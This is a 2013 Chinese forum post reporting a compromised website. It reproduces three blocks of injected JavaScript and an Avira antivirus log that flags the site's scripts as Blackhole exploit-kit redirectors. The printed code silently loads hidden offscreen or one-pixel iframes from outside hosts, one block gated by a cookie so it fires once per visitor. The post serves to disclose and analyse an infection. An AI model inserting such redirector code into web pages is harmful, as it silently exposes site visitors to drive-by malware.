裏面（生人勿進！）

显示全部楼层 · 发表于 2013-8-24 06:25:26

http://www.marsie.ir/

复制代码

if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://unknowncommute.su/img1/count.htm' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://unknowncommute.su/img1/count.htm');
f.style.left = '-10000px';
f.style.visibility = 'hidden';
f.style.top = '0';
f.style.position = 'absolute';
f.style.top = '0';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
}

复制代码

function zzzfff() {
var ki = document.createElement('iframe');
ki.src = 'http://caltecsafety.co.uk/wp-content/clicker.php';
ki.style.position = 'absolute';
ki.style.border = '0';
ki.style.height = '1px';
ki.style.width = '1px';
ki.style.left = '1px';
ki.style.top = '1px';
if (!document.getElementById('ki')) {
document.write('<div id=\'ki\'></div>');
document.getElementById('ki').appendChild(ki);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

function zzzfff() {
var ra = document.createElement('iframe');
ra.src = 'http://caltecsafety.co.uk/wp-content/clicker.php';
ra.style.position = 'absolute';
ra.style.border = '0';
ra.style.height = '1px';
ra.style.width = '1px';
ra.style.left = '1px';
ra.style.top = '1px';
if (!document.getElementById('ra')) {
document.write('<div id=\'ra\'></div>');
document.getElementById('ra').appendChild(ra);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

Avira

2013/8/24 上午 06:14 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\mootools[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]
   已採取動作：
   檔案會移動至 '1e70081d.qua' 名稱底下的隔離區目錄。.

2013/8/24 上午 06:14 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\mod_yoo_accordion[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]
   已採取動作：
   檔案會移動至 '4cd252f5.qua' 名稱底下的隔離區目錄。.

2013/8/24 上午 06:14 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\ie5_Packed[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]
   已採取動作：
   檔案會移動至 '54727d4c.qua' 名稱底下的隔離區目錄。.

2013/8/24 上午 06:14 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 798
   目錄數： 0
   惡意程式碼數： 5
   警告數： 0

2013/8/24 上午 06:14 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\DropDownMenuX_Packed[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]
   已採取動作：
   檔案會移動至 '3dc36aec.qua' 名稱底下的隔離區目錄。.

2013/8/24 上午 06:14 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\DD_roundies[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]
   已採取動作：
   檔案會移動至 '78b747e0.qua' 名稱底下的隔離區目錄。.

2013/8/24 上午 06:14 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\marsie_ir[1].htm'
   包含病毒或有害的程式 'JS/Agent.axquo' [virus]
   已採取動作：
   檔案會移動至 '5ea87d60.qua' 名稱底下的隔離區目錄。.

2013/8/24 上午 06:14 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 793
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/8/24 上午 06:14 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\mod_yoo_accordion[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/24 上午 06:14 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\DropDownMenuX_Packed[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：拒絕存取

2013/8/24 上午 06:14 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\ie5_Packed[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：拒絕存取

2013/8/24 上午 06:14 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\DD_roundies[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：拒絕存取

2013/8/24 上午 06:14 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir/modules/mod_yoo_accordion/mod_yoo_accordion.js"
   存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]。
   已採取動作：已略過

2013/8/24 上午 06:14 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\mootools[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/24 上午 06:14 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\mod_yoo_accordion[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：拒絕存取

2013/8/24 上午 06:13 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\DD_roundies[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/24 上午 06:13 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir/media/system/js/caption.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]。
   已採取動作：封鎖的檔案

2013/8/24 上午 06:13 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir/media/system/js/mootools.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]。
   已採取動作：已略過

2013/8/24 上午 06:13 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\mootools[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：拒絕存取

2013/8/24 上午 06:13 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\ie5_Packed[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/24 上午 06:13 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir/templates/sw_marsie/js/DD_roundies.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]。
   已採取動作：已略過

2013/8/24 上午 06:13 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\DropDownMenuX_Packed[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DD.17 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/24 上午 06:13 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir//modules/mod_swmenupro/ie5_Packed.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]。
   已採取動作：已略過

2013/8/24 上午 06:13 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir/modules/mod_swmenupro/DropDownMenuX_Packed.js"
   存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DD.17' [virus]。
   已採取動作：已略過

2013/8/24 上午 06:13 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\marsie_ir[1].htm 中
   偵測到病毒或有害的程式 'JS/Agent.axquo [virus]'
   執行的動作：傳輸至掃描程式

2013/8/24 上午 06:13 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\marsie_ir[1].htm 中
   偵測到病毒或有害的程式 'JS/Agent.axquo [virus]'
   執行的動作：拒絕存取

2013/8/24 上午 06:13 [Web Protection] 發現惡意程式碼
   從 URL "http://www.marsie.ir/" 存取資料時，
   發現病毒或有害的程式 'JS/Agent.axquo' [virus]。
   已採取動作：已略過

[已鉴定] 裏面（生人勿進！）